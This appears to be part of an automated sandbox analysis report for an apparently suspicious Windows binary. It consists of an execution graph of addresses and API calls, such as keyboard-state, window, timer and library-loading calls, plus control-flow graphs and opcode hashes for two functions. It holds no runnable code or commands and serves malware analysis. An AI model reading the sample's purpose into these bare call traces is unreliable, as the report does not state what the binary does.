                                                                                                                                                                                                            execution_graph 99750 794d2d0 99751 794d2e6 99750->99751 99754 794b66a 99750->99754 99759 794b678 99750->99759 99755 794b6be 99754->99755 99756 794b6e1 99755->99756 99764 4ea26cc 99755->99764 99771 4ea6b72 99755->99771 99756->99751 99760 794b6be 99759->99760 99761 794b6e1 99760->99761 99762 4ea26cc 8 API calls 99760->99762 99763 4ea6b72 8 API calls 99760->99763 99761->99751 99762->99761 99763->99761 99765 4ea26d7 99764->99765 99766 4ea6c5c 99765->99766 99767 4ea6bb2 99765->99767 99777 4ea25a4 99766->99777 99769 4ea6c0a CallWindowProcW 99767->99769 99770 4ea6bb9 99767->99770 99769->99770 99770->99756 99772 4ea6c5c 99771->99772 99773 4ea6bb2 99771->99773 99774 4ea25a4 7 API calls 99772->99774 99775 4ea6c0a CallWindowProcW 99773->99775 99776 4ea6bb9 99773->99776 99774->99776 99775->99776 99776->99756 99778 4ea25af 99777->99778 99779 4ea5529 99778->99779 99781 4ea5519 99778->99781 99780 4ea26cc 8 API calls 99779->99780 99782 4ea5527 99780->99782 99781->99782 99788 16e2eaa0 99781->99788 99794 4ea5640 99781->99794 99799 4ea5650 99781->99799 99804 16e2ea70 99781->99804 99810 4ea571c 99781->99810 99789 16e2eaad 99788->99789 99790 16e2eab5 99789->99790 99792 4ea26cc 8 API calls 99789->99792 99793 4ea6b72 8 API calls 99789->99793 99790->99782 99791 16e2eae0 99791->99782 99792->99791 99793->99791 99796 4ea5644 99794->99796 99795 4ea56f0 99795->99782 99816 4ea56f8 99796->99816 99829 4ea5708 99796->99829 99801 4ea5664 99799->99801 99800 4ea56f0 99800->99782 99802 4ea56f8 8 API calls 99801->99802 99803 4ea5708 8 API calls 99801->99803 99802->99800 99803->99800 99805 16e2ea74 99804->99805 99806 16e2eab5 99805->99806 99808 4ea26cc 8 API calls 99805->99808 99809 4ea6b72 8 API calls 99805->99809 99806->99782 99807 16e2eae0 99807->99782 99808->99807 99809->99807 99811 4ea56da 99810->99811 99812 4ea572a 99810->99812 99814 4ea56f8 8 API calls 99811->99814 99815 4ea5708 8 API calls 99811->99815 99813 4ea56f0 99813->99782 99814->99813 99815->99813 99817 4ea56fc 99816->99817 99818 4ea5719 99817->99818 99841 794ef58 99817->99841 99846 794ef60 99817->99846 99852 4ea6b50 99817->99852 99855 4ea5f38 99817->99855 99866 794aff7 99817->99866 99889 4ea5f28 99817->99889 99900 794b5fa 99817->99900 99907 794f408 99817->99907 99914 794f3f9 99817->99914 99920 794b008 99817->99920 99818->99795 99830 4ea5719 99829->99830 99831 4ea5f28 8 API calls 99829->99831 99832 4ea5f38 8 API calls 99829->99832 99833 794aff7 8 API calls 99829->99833 99834 794ef60 8 API calls 99829->99834 99835 4ea6b50 8 API calls 99829->99835 99836 794b008 8 API calls 99829->99836 99837 794ef58 8 API calls 99829->99837 99838 794f408 8 API calls 99829->99838 99839 794f3f9 8 API calls 99829->99839 99840 794b5fa 8 API calls 99829->99840 99830->99795 99831->99830 99832->99830 99833->99830 99834->99830 99835->99830 99836->99830 99837->99830 99838->99830 99839->99830 99840->99830 99842 794ef60 99841->99842 99843 794ef75 99842->99843 99943 794efc8 99842->99943 99949 794efb8 99842->99949 99843->99818 99847 794efa0 99846->99847 99848 794ef6e 99846->99848 99847->99818 99849 794ef75 99848->99849 99850 794efb8 8 API calls 99848->99850 99851 794efc8 8 API calls 99848->99851 99849->99818 99850->99849 99851->99849 99853 4ea26cc 8 API calls 99852->99853 99854 4ea6b5a 99853->99854 99854->99818 99856 4ea5f84 99855->99856 99857 4ea6864 GetKeyState 99856->99857 99859 4ea5fd5 99856->99859 99863 4ea6932 99856->99863 99858 4ea6890 GetKeyState 99857->99858 99861 4ea68e3 GetFocus 99858->99861 99859->99818 99861->99863 99863->99859 99864 794b678 5 API calls 99863->99864 99865 794b66a 5 API calls 99863->99865 99864->99859 99865->99859 99867 794b021 99866->99867 99876 794b03d 99866->99876 99868 794b026 99867->99868 99869 794b068 99867->99869 99870 794b042 99868->99870 99871 794b02b 99868->99871 99872 794b2f4 99869->99872 99873 794b079 99869->99873 99869->99876 99870->99876 99877 794b1b6 99870->99877 99881 794b2bc 99870->99881 99884 794b16e 99870->99884 99874 794b034 99871->99874 99875 794b252 99871->99875 99977 794a470 99872->99977 99873->99876 99873->99877 99873->99884 99874->99876 99878 794b2ca 99874->99878 99965 794a3c0 99875->99965 99876->99877 99885 794b5c7 8 API calls 99876->99885 99886 794b5d8 8 API calls 99876->99886 99877->99818 99973 794a440 99878->99973 99969 794a430 99881->99969 99955 794b5d8 99884->99955 99960 794b5c7 99884->99960 99885->99877 99886->99877 99890 4ea5f84 99889->99890 99891 4ea5fd5 99890->99891 99892 4ea6864 GetKeyState 99890->99892 99897 4ea6932 99890->99897 99891->99818 99893 4ea6890 GetKeyState 99892->99893 99895 4ea68e3 GetFocus 99893->99895 99895->99897 99897->99891 99898 794b678 5 API calls 99897->99898 99899 794b66a 5 API calls 99897->99899 99898->99891 99899->99891 99901 794b616 99900->99901 99903 794b638 99900->99903 99902 794b624 99901->99902 99904 4ea5f28 8 API calls 99901->99904 99905 4ea5f38 8 API calls 99901->99905 99906 4ea6b50 8 API calls 99901->99906 99902->99818 99903->99818 99904->99902 99905->99902 99906->99902 99908 794f489 99907->99908 99910 794f42a 99907->99910 99909 794f490 99908->99909 99911 4ea5f28 8 API calls 99908->99911 99912 4ea5f38 8 API calls 99908->99912 99913 4ea6b50 8 API calls 99908->99913 99909->99818 99910->99818 99911->99909 99912->99909 99913->99909 99915 794f408 99914->99915 99916 794f42a 99915->99916 99917 4ea5f28 8 API calls 99915->99917 99918 4ea5f38 8 API calls 99915->99918 99919 4ea6b50 8 API calls 99915->99919 99916->99818 99917->99916 99918->99916 99919->99916 99921 794b021 99920->99921 99929 794b03d 99920->99929 99922 794b026 99921->99922 99923 794b068 99921->99923 99924 794b02b 99922->99924 99933 794b042 99922->99933 99925 794b2f4 99923->99925 99926 794b079 99923->99926 99923->99929 99927 794b034 99924->99927 99928 794b252 99924->99928 99932 794a470 8 API calls 99925->99932 99926->99929 99934 794b1b6 99926->99934 99938 794b16e 99926->99938 99927->99929 99930 794b2ca 99927->99930 99931 794a3c0 8 API calls 99928->99931 99929->99934 99941 794b5c7 8 API calls 99929->99941 99942 794b5d8 8 API calls 99929->99942 99936 794a440 8 API calls 99930->99936 99931->99934 99932->99934 99933->99929 99933->99934 99935 794b2bc 99933->99935 99933->99938 99934->99818 99937 794a430 8 API calls 99935->99937 99936->99934 99937->99934 99939 794b5c7 8 API calls 99938->99939 99940 794b5d8 8 API calls 99938->99940 99939->99934 99940->99934 99941->99934 99942->99934 99944 794efee 99943->99944 99945 794f023 99943->99945 99944->99843 99945->99944 99946 4ea5f28 8 API calls 99945->99946 99947 4ea5f38 8 API calls 99945->99947 99948 4ea6b50 8 API calls 99945->99948 99946->99944 99947->99944 99948->99944 99950 794efee 99949->99950 99951 794f023 99949->99951 99950->99843 99951->99950 99952 4ea5f28 8 API calls 99951->99952 99953 4ea5f38 8 API calls 99951->99953 99954 4ea6b50 8 API calls 99951->99954 99952->99950 99953->99950 99954->99950 99956 794b5e3 99955->99956 99957 794b5ea 99955->99957 99956->99877 99959 794b5fa 8 API calls 99957->99959 99958 794b5f0 99958->99877 99959->99958 99961 794b5ea 99960->99961 99962 794b5e3 99960->99962 99964 794b5fa 8 API calls 99961->99964 99962->99877 99963 794b5f0 99963->99877 99964->99963 99966 794a3cb 99965->99966 99967 794b5d8 8 API calls 99966->99967 99968 794bbee 99967->99968 99968->99877 99970 794a43b 99969->99970 99971 794b5d8 8 API calls 99970->99971 99972 794e634 99971->99972 99972->99877 99974 794a44b 99973->99974 99975 794b5d8 8 API calls 99974->99975 99976 794dfeb 99974->99976 99975->99976 99976->99877 99978 794a47b 99977->99978 99979 794b5d8 8 API calls 99978->99979 99980 794d2b1 99979->99980 99980->99877 99561 4ea23ed 99562 4ea23f8 99561->99562 99565 794f498 99561->99565 99571 794f4a8 99561->99571 99567 794f4ba 99565->99567 99566 794f4f7 99566->99562 99567->99566 99577 794f7b8 99567->99577 99581 794f7c8 99567->99581 99585 794f9f1 99567->99585 99573 794f4ba 99571->99573 99572 794f4f7 99572->99562 99573->99572 99574 794f9f1 GetCurrentThreadId 99573->99574 99575 794f7b8 GetCurrentThreadId 99573->99575 99576 794f7c8 GetCurrentThreadId 99573->99576 99574->99572 99575->99572 99576->99572 99579 794f7eb 99577->99579 99578 794f9ea 99578->99566 99579->99578 99589 f0f65b8 99579->99589 99583 794f7eb 99581->99583 99582 794f9ea 99582->99566 99583->99582 99584 f0f65b8 GetCurrentThreadId 99583->99584 99584->99582 99587 794f9ac 99585->99587 99586 794f9ea 99586->99566 99587->99586 99588 f0f65b8 GetCurrentThreadId 99587->99588 99588->99586 99590 f0f65df 99589->99590 99593 f0f4854 99590->99593 99594 f0f485f 99593->99594 99595 f0f67ef GetCurrentThreadId 99594->99595 99596 f0f6603 99594->99596 99595->99596 99601 f0fd528 DispatchMessageW 99602 f0fd594 99601->99602 100022 f0f7588 100023 f0f75a2 100022->100023 100026 f0f75b5 100022->100026 100028 f0f6ca0 100023->100028 100025 f0f75fb 100026->100025 100027 f0f6ca0 OleInitialize 100026->100027 100027->100025 100029 f0f6cab 100028->100029 100030 f0f7626 100029->100030 100033 f0f7660 100029->100033 100039 f0f7650 100029->100039 100030->100026 100034 f0f7968 100033->100034 100035 f0f7688 100033->100035 100034->100030 100036 f0f7691 100035->100036 100045 f0f6d3c 100035->100045 100036->100030 100038 f0f76b4 100040 f0f7968 100039->100040 100041 f0f7688 100039->100041 100040->100030 100042 f0f7691 100041->100042 100043 f0f6d3c OleInitialize 100041->100043 100042->100030 100044 f0f76b4 100043->100044 100046 f0f6d47 100045->100046 100048 f0f79ab 100046->100048 100049 f0f6d58 100046->100049 100048->100038 100050 f0f79e0 OleInitialize 100049->100050 100051 f0f7a44 100050->100051 100051->100048 100068 bbd01c 100069 bbd034 100068->100069 100070 bbd08e 100069->100070 100076 4ea25a4 8 API calls 100069->100076 100077 4ea54ca 100069->100077 100088 4ea4758 100069->100088 100092 4ea54b8 100069->100092 100103 4ea259b 100069->100103 100114 4ea4768 100069->100114 100076->100070 100080 4ea54f5 100077->100080 100078 4ea5529 100079 4ea26cc 8 API calls 100078->100079 100082 4ea5527 100079->100082 100080->100078 100081 4ea5519 100080->100081 100081->100082 100083 16e2eaa0 8 API calls 100081->100083 100084 16e2ea70 8 API calls 100081->100084 100085 4ea571c 8 API calls 100081->100085 100086 4ea5640 8 API calls 100081->100086 100087 4ea5650 8 API calls 100081->100087 100083->100082 100084->100082 100085->100082 100086->100082 100087->100082 100089 4ea475c 100088->100089 100090 4ea25a4 8 API calls 100089->100090 100091 4ea47af 100090->100091 100091->100070 100095 4ea54bc 100092->100095 100093 4ea5529 100094 4ea26cc 8 API calls 100093->100094 100097 4ea5527 100094->100097 100095->100093 100096 4ea5519 100095->100096 100096->100097 100098 16e2eaa0 8 API calls 100096->100098 100099 16e2ea70 8 API calls 100096->100099 100100 4ea571c 8 API calls 100096->100100 100101 4ea5640 8 API calls 100096->100101 100102 4ea5650 8 API calls 100096->100102 100098->100097 100099->100097 100100->100097 100101->100097 100102->100097 100104 4ea25af 100103->100104 100105 4ea5529 100104->100105 100107 4ea5519 100104->100107 100106 4ea26cc 8 API calls 100105->100106 100108 4ea5527 100106->100108 100107->100108 100109 16e2eaa0 8 API calls 100107->100109 100110 16e2ea70 8 API calls 100107->100110 100111 4ea571c 8 API calls 100107->100111 100112 4ea5640 8 API calls 100107->100112 100113 4ea5650 8 API calls 100107->100113 100109->100108 100110->100108 100111->100108 100112->100108 100113->100108 100115 4ea478e 100114->100115 100116 4ea25a4 8 API calls 100115->100116 100117 4ea47af 100116->100117 100117->100070 100120 c26608 100121 c26624 100120->100121 100122 c26690 100121->100122 100127 c26871 100121->100127 100132 c268a9 100121->100132 100138 7949f7f 100121->100138 100142 7949f90 100121->100142 100128 c26874 100127->100128 100146 c26970 100128->100146 100150 c26980 100128->100150 100133 c2686d 100132->100133 100135 c268b6 100133->100135 100136 c26980 CreateActCtxA 100133->100136 100137 c26970 CreateActCtxA 100133->100137 100134 c2689f 100134->100121 100135->100121 100136->100134 100137->100134 100139 7949fa2 100138->100139 100158 7949cdc 100139->100158 100143 7949fa2 100142->100143 100144 7949cdc WaitMessage 100143->100144 100145 7949fc2 100144->100145 100145->100121 100148 c26974 100146->100148 100147 c26a84 100148->100147 100154 c263f0 100148->100154 100152 c269a7 100150->100152 100151 c26a84 100151->100151 100152->100151 100153 c263f0 CreateActCtxA 100152->100153 100153->100151 100155 c27a10 CreateActCtxA 100154->100155 100157 c27ad3 100155->100157 100157->100157 100159 7949ce7 100158->100159 100162 7949d1c 100159->100162 100161 794a0d4 100161->100161 100163 7949d27 100162->100163 100164 794a782 100163->100164 100166 f0fc881 100163->100166 100164->100161 100168 f0fc8b1 100166->100168 100167 f0fcc90 WaitMessage 100167->100168 100168->100167 100169 f0fc93c 100168->100169 99597 794ee98 99599 794eedd GetClassInfoW 99597->99599 99600 794ef23 99599->99600 99603 4ea6cd8 99604 4ea6ce8 99603->99604 99610 794bd92 99604->99610 99614 4ea86e6 99604->99614 99620 794be48 99604->99620 99627 794bda0 99604->99627 99605 4ea6d11 99611 794bdd5 99610->99611 99613 4ea86e6 2 API calls 99611->99613 99612 794be2a 99612->99605 99613->99612 99615 4ea86eb 99614->99615 99617 4ea872b 99615->99617 99631 4ea6e50 99615->99631 99618 4ea6e50 2 API calls 99617->99618 99619 4ea8864 99617->99619 99618->99619 99619->99605 99621 794bde3 99620->99621 99622 794be4e SetWindowTextW 99620->99622 99626 4ea86e6 2 API calls 99621->99626 99624 794bec9 99622->99624 99624->99605 99625 794be2a 99625->99605 99626->99625 99628 794bdd5 99627->99628 99630 4ea86e6 2 API calls 99628->99630 99629 794be2a 99629->99605 99630->99629 99632 4ea6e60 99631->99632 99633 4ea6e9d 99632->99633 99636 794ad01 99632->99636 99645 794ad10 99632->99645 99633->99617 99637 794ad49 99636->99637 99638 794ade7 99637->99638 99654 4ea281c 99637->99654 99659 4ea2820 99637->99659 99664 7943889 99638->99664 99678 7943898 99638->99678 99692 7943971 99638->99692 99639 794ae5d 99646 794ad49 99645->99646 99647 794ade7 99646->99647 99652 4ea281c 2 API calls 99646->99652 99653 4ea2820 2 API calls 99646->99653 99649 7943971 2 API calls 99647->99649 99650 7943898 2 API calls 99647->99650 99651 7943889 2 API calls 99647->99651 99648 794ae5d 99649->99648 99650->99648 99651->99648 99652->99647 99653->99647 99656 4ea2851 99654->99656 99658 4ea295e 99654->99658 99655 4ea285d 99655->99638 99656->99655 99706 4ea2420 SendMessageW SendMessageW 99656->99706 99658->99638 99661 4ea295e 99659->99661 99662 4ea2851 99659->99662 99660 4ea285d 99660->99638 99661->99638 99662->99660 99707 4ea2420 SendMessageW SendMessageW 99662->99707 99667 7943898 99664->99667 99665 79439b4 99665->99639 99666 794399a 99673 794c650 2 API calls 99666->99673 99674 794c4a0 2 API calls 99666->99674 99675 794c492 2 API calls 99666->99675 99676 794c608 2 API calls 99666->99676 99677 794c5f8 2 API calls 99666->99677 99667->99665 99667->99666 99708 794c4a0 99667->99708 99714 794c650 99667->99714 99719 794c492 99667->99719 99725 794c608 99667->99725 99731 794c5f8 99667->99731 99673->99665 99674->99665 99675->99665 99676->99665 99677->99665 99679 79438c1 99678->99679 99680 79439b4 99679->99680 99681 794399a 99679->99681 99687 794c650 2 API calls 99679->99687 99688 794c4a0 2 API calls 99679->99688 99689 794c492 2 API calls 99679->99689 99690 794c608 2 API calls 99679->99690 99691 794c5f8 2 API calls 99679->99691 99680->99639 99682 794c650 2 API calls 99681->99682 99683 794c4a0 2 API calls 99681->99683 99684 794c492 2 API calls 99681->99684 99685 794c608 2 API calls 99681->99685 99686 794c5f8 2 API calls 99681->99686 99682->99680 99683->99680 99684->99680 99685->99680 99686->99680 99687->99681 99688->99681 99689->99681 99690->99681 99691->99681 99693 7943976 99692->99693 99694 794399a 99693->99694 99701 794c650 2 API calls 99693->99701 99702 794c4a0 2 API calls 99693->99702 99703 794c492 2 API calls 99693->99703 99704 794c608 2 API calls 99693->99704 99705 794c5f8 2 API calls 99693->99705 99696 794c650 2 API calls 99694->99696 99697 794c4a0 2 API calls 99694->99697 99698 794c492 2 API calls 99694->99698 99699 794c608 2 API calls 99694->99699 99700 794c5f8 2 API calls 99694->99700 99695 79439b4 99695->99639 99696->99695 99697->99695 99698->99695 99699->99695 99700->99695 99701->99694 99702->99694 99703->99694 99704->99694 99705->99694 99706->99658 99707->99661 99709 794c4b1 99708->99709 99710 794c511 99709->99710 99738 794c698 SendMessageW 99709->99738 99740 794c692 SendMessageW 99709->99740 99710->99666 99711 794c681 99711->99666 99715 794c65b 99714->99715 99717 794c692 SendMessageW 99715->99717 99718 794c698 SendMessageW 99715->99718 99716 794c681 99716->99666 99717->99716 99718->99716 99721 794c4a0 99719->99721 99720 794c511 99720->99666 99721->99720 99723 794c692 SendMessageW 99721->99723 99724 794c698 SendMessageW 99721->99724 99722 794c681 99722->99666 99723->99722 99724->99722 99726 794c616 99725->99726 99727 794c61a 99725->99727 99726->99666 99729 794c692 SendMessageW 99727->99729 99730 794c698 SendMessageW 99727->99730 99728 794c681 99728->99666 99729->99728 99730->99728 99732 794c5e3 99731->99732 99734 794c602 99731->99734 99732->99666 99733 794c616 99733->99666 99734->99733 99736 794c692 SendMessageW 99734->99736 99737 794c698 SendMessageW 99734->99737 99735 794c681 99735->99666 99736->99735 99737->99735 99739 794c704 99738->99739 99739->99711 99741 794c704 99740->99741 99741->99711 100052 c2db50 100053 c2db92 100052->100053 100054 c2db98 GetModuleHandleW 100052->100054 100053->100054 100055 c2dbc5 100054->100055 100118 16e2eb51 SetTimer 100119 16e2eb8c 100118->100119 99985 f0f697b 99986 f0f698e 99985->99986 99990 f0f6ba0 PostMessageW 99986->99990 99992 f0f6b9d PostMessageW 99986->99992 99987 f0f69b1 99991 f0f6c0c 99990->99991 99991->99987 99993 f0f6c0c 99992->99993 99993->99987 99994 5fb008e 99996 5fb00a8 99994->99996 99995 5fb00de 99996->99995 100004 5fd87e0 99996->100004 100011 5fd87f0 99996->100011 99997 5fb0f7e 100000 5fd87f0 GetCurrentThreadId 99997->100000 100001 5fd87e0 GetCurrentThreadId 99997->100001 99998 5fb5cee 99999 5fb1a05 99998->99999 99999->99998 100000->99999 100001->99999 100005 5fd881b 100004->100005 100006 5fd8814 100004->100006 100010 5fd8842 100005->100010 100018 5fd5a9c 100005->100018 100006->99997 100009 5fd5a9c GetCurrentThreadId 100009->100010 100010->99997 100012 5fd881b 100011->100012 100013 5fd8814 100011->100013 100014 5fd5a9c GetCurrentThreadId 100012->100014 100017 5fd8842 100012->100017 100013->99997 100015 5fd8838 100014->100015 100016 5fd5a9c GetCurrentThreadId 100015->100016 100016->100017 100017->99997 100019 5fd5aa7 100018->100019 100020 5fd8b5f GetCurrentThreadId 100019->100020 100021 5fd8838 100019->100021 100020->100021 100021->100009 100056 f0fe098 100057 f0fe0a8 100056->100057 100061 f0fe0c8 100057->100061 100064 f0fe0d0 SendMessageW 100057->100064 100058 f0fe0b9 100062 f0fe0d0 SendMessageW 100061->100062 100063 f0fe13c 100062->100063 100063->100058 100065 f0fe13c 100064->100065 100065->100058 99742 c2dff8 99743 c2e00c 99742->99743 99745 c2e031 99743->99745 99746 c2dbe8 99743->99746 99747 c2e1d8 LoadLibraryExW 99746->99747 99749 c2e251 99747->99749 99749->99745 99981 4ea45b0 99982 4ea4618 CreateWindowExW 99981->99982 99984 4ea46d4 99982->99984 100170 c2fd18 100171 c2fd5e GetCurrentProcess 100170->100171 100173 c2fdb0 GetCurrentThread 100171->100173 100175 c2fda9 100171->100175 100174 c2fded GetCurrentProcess 100173->100174 100176 c2fde6 100173->100176 100177 c2fe23 GetCurrentThreadId 100174->100177 100175->100173 100176->100174 100179 c2fe7c 100177->100179 100180 7037cd8 100181 7037d26 DrawTextExW 100180->100181 100183 7037d7e 100181->100183 100184 794e648 100185 794e66f 100184->100185 100186 794e6d0 100185->100186 100189 4ea043c 100185->100189 100193 4ea2227 100185->100193 100190 4ea0447 100189->100190 100196 4ea07c0 100190->100196 100194 4ea07c0 3 API calls 100193->100194 100195 4ea224f 100193->100195 100194->100195 100195->100186 100198 4ea07cb 100196->100198 100197 4ea224f 100197->100186 100198->100197 100200 4ea2322 100198->100200 100202 4ea281c 2 API calls 100198->100202 100203 4ea2820 2 API calls 100198->100203 100199 4ea23c1 100204 794f498 GetCurrentThreadId 100199->100204 100205 794f4a8 GetCurrentThreadId 100199->100205 100200->100199 100201 4ea07c0 3 API calls 100200->100201 100201->100200 100202->100200 100203->100200 100204->100197 100205->100197 100066 f0fcd90 PeekMessageW 100067 f0fce07 100066->100067

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 05FB008E Relevance: 11.7, Instructions: 11731COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 296 5fb008e-5fb00dc 299 5fb00de-5fb00e5 296->299 300 5fb00e6-5fb0155 296->300 2670 5fb0158 call 5fc15a0 300->2670 2671 5fb0158 call 5fc1591 300->2671 309 5fb015d-5fb01f9 2683 5fb01fc call 5fcb098 309->2683 2684 5fb01fc call 5fcb088 309->2684 321 5fb0201-5fb0274 2685 5fb0277 call 5fcf658 321->2685 2686 5fb0277 call 5fcf648 321->2686 330 5fb027c-5fb029d 2687 5fb02a0 call 5fd5fe0 330->2687 2688 5fb02a0 call 5fd5fd2 330->2688 333 5fb02a5-5fb031b 2674 5fb0321 call 5fd6ab0 333->2674 2675 5fb0321 call 5fd6aa0 333->2675 342 5fb0326-5fb034d 2678 5fb0353 call 5fd6b60 342->2678 2679 5fb0353 call 5fd6ae0 342->2679 2680 5fb0353 call 5fd6b52 342->2680 345 5fb0358-5fb0f44 2689 5fb0f47 call 5fd82a1 345->2689 2690 5fb0f47 call 5fd82b0 345->2690 525 5fb0f4a-5fb0f78 2691 5fb0f7b call 5fd87f0 525->2691 2692 5fb0f7b call 5fd87e0 525->2692 527 5fb0f7e-5fb19ff 2676 5fb1a02 call 5fd87f0 527->2676 2677 5fb1a02 call 5fd87e0 527->2677 632 5fb1a05-5fb1d95 667 5fb1dbf 632->667 668 5fb1d97-5fb1da3 632->668 671 5fb1dc5-5fb2c97 667->671 669 5fb1dad-5fb1db3 668->669 670 5fb1da5-5fb1dab 668->670 672 5fb1dbd 669->672 670->672 2672 5fb2c9d call 5fdfa60 671->2672 2673 5fb2c9d call 5fdfa50 671->2673 672->671 825 5fb2ca0-5fb4a36 2681 5fb4a39 call 7033908 825->2681 2682 5fb4a39 call 7033918 825->2682 1119 5fb4a3c-5fb4cd2 1146 5fb4cde-5fb5cd6 1119->1146 1317 5fb5ce2 1146->1317 1318 5fb5cee-5fb7dd7 1317->1318 1670 5fb7de3-5fbdd02 1318->1670 2670->309 2671->309 2672->825 2673->825 2674->342 2675->342 2676->632 2677->632 2678->345 2679->345 2680->345 2681->1119 2682->1119 2683->321 2684->321 2685->330 2686->330 2687->333 2688->333 2689->525 2690->525 2691->527 2692->527
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c3ea0df623942a048cd65786585ef7db1282ef137e9eae7dbd1295713ddf2639
                                                                                                                                                                                                            • Instruction ID: 923e1e783695125886e96cad4fdda5b30e3ebfc67993b0065ab2eeaec502c57a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3ea0df623942a048cd65786585ef7db1282ef137e9eae7dbd1295713ddf2639
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D64BF38901629CFCB25DF64C9889D9BBB2FF49305F1046E9E509AB361DB35AE85CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 07943B50 Relevance: 6.9, Strings: 5, Instructions: 617COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 2714 7943b50-7943b78 2715 7943b7e-7943b83 2714->2715 2716 794405b-79440c4 2714->2716 2715->2716 2717 7943b89-7943ba6 2715->2717 2724 79440cb-7944153 2716->2724 2723 7943bac-7943bb0 2717->2723 2717->2724 2725 7943bb2-7943bbc 2723->2725 2726 7943bbf-7943bc3 2723->2726 2760 794415e-79441de 2724->2760 2725->2726 2729 7943bc5-7943bcf 2726->2729 2730 7943bd2-7943bd9 2726->2730 2729->2730 2731 7943cf4-7943cf9 2730->2731 2732 7943bdf-7943c0f 2730->2732 2735 7943d01-7943d06 2731->2735 2736 7943cfb-7943cff 2731->2736 2743 79443de-7944404 2732->2743 2744 7943c15-7943ce8 2732->2744 2740 7943d18-7943d48 2735->2740 2736->2735 2739 7943d08-7943d0c 2736->2739 2742 7943d12-7943d15 2739->2742 2739->2743 2740->2760 2761 7943d4e-7943d51 2740->2761 2742->2740 2752 7944414 2743->2752 2753 7944406-7944412 2743->2753 2744->2731 2769 7943cea 2744->2769 2756 7944417-794441c 2752->2756 2753->2756 2776 79441e5-7944267 2760->2776 2761->2760 2764 7943d57-7943d59 2761->2764 2764->2760 2767 7943d5f-7943d94 2764->2767 2767->2776 2777 7943d9a-7943da3 2767->2777 2769->2731 2782 794426f-79442f1 2776->2782 2778 7943f06-7943f0a 2777->2778 2779 7943da9-7943e03 2777->2779 2781 7943f10-7943f14 2778->2781 2778->2782 2821 7943e15 2779->2821 2822 7943e05-7943e0e 2779->2822 2785 79442f9-7944326 2781->2785 2786 7943f1a-7943f20 2781->2786 2782->2785 2797 794432d-79443ad 2785->2797 2789 7943f24-7943f59 2786->2789 2790 7943f22 2786->2790 2794 7943f60-7943f66 2789->2794 2790->2794 2796 7943f6c-7943f74 2794->2796 2794->2797 2801 7943f76-7943f7a 2796->2801 2802 7943f7b-7943f7d 2796->2802 2855 79443b4-79443d6 2797->2855 2801->2802 2807 7943fdf-7943fe5 2802->2807 2808 7943f7f-7943f82 2802->2808 2815 7944004-7944032 2807->2815 2816 7943fe7-7944002 2807->2816 2818 7943f8c-7943fa3 2808->2818 2832 794403a-7944046 2815->2832 2816->2832 2840 7943fa5-7943faa 2818->2840 2841 7943fac-7943fb0 2818->2841 2824 7943e19-7943e1b 2821->2824 2822->2824 2828 7943e10-7943e13 2822->2828 2830 7943e22-7943e26 2824->2830 2831 7943e1d 2824->2831 2828->2824 2837 7943e34-7943e3a 2830->2837 2838 7943e28-7943e2f 2830->2838 2831->2830 2832->2855 2856 794404c-7944058 2832->2856 2844 7943e44-7943e49 2837->2844 2845 7943e3c-7943e42 2837->2845 2843 7943ed1-7943ed5 2838->2843 2847 7943fbc-7943fdd 2840->2847 2841->2743 2848 7943fb6-7943fb9 2841->2848 2853 7943ef4-7943f00 2843->2853 2854 7943ed7-7943ef1 2843->2854 2851 7943e4f-7943e55 2844->2851 2845->2851 2847->2832 2848->2847 2859 7943e57-7943e59 2851->2859 2860 7943e5b-7943e60 2851->2860 2853->2778 2853->2779 2854->2853 2855->2743 2866 7943e62-7943e74 2859->2866 2860->2866 2871 7943e76-7943e7c 2866->2871 2872 7943e7e-7943e83 2866->2872 2873 7943e89-7943e90 2871->2873 2872->2873 2877 7943e96 2873->2877 2878 7943e92-7943e94 2873->2878 2881 7943e9b-7943ea6 2877->2881 2878->2881 2882 7943ea8-7943eab 2881->2882 2883 7943eca 2881->2883 2882->2843 2885 7943ead-7943eb3 2882->2885 2883->2843 2886 7943eb5-7943eb8 2885->2886 2887 7943eba-7943ec3 2885->2887 2886->2883 2886->2887 2887->2843 2889 7943ec5-7943ec8 2887->2889 2889->2843 2889->2883
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-1079488684
                                                                                                                                                                                                            • Opcode ID: e065ef4ab36db4e16cb33fddb08eda44d884718e379068b46f11432e824ddf2d
                                                                                                                                                                                                            • Instruction ID: b3c96e7a91c0f8747c5b1362716d307e1a9f8b9c95957753cef0313bb5cb7bb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e065ef4ab36db4e16cb33fddb08eda44d884718e379068b46f11432e824ddf2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36328DB0A00258CFDB54DFB9C850B9EBBF6AF88304F1485AAD409BB395DB349D45CB91
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

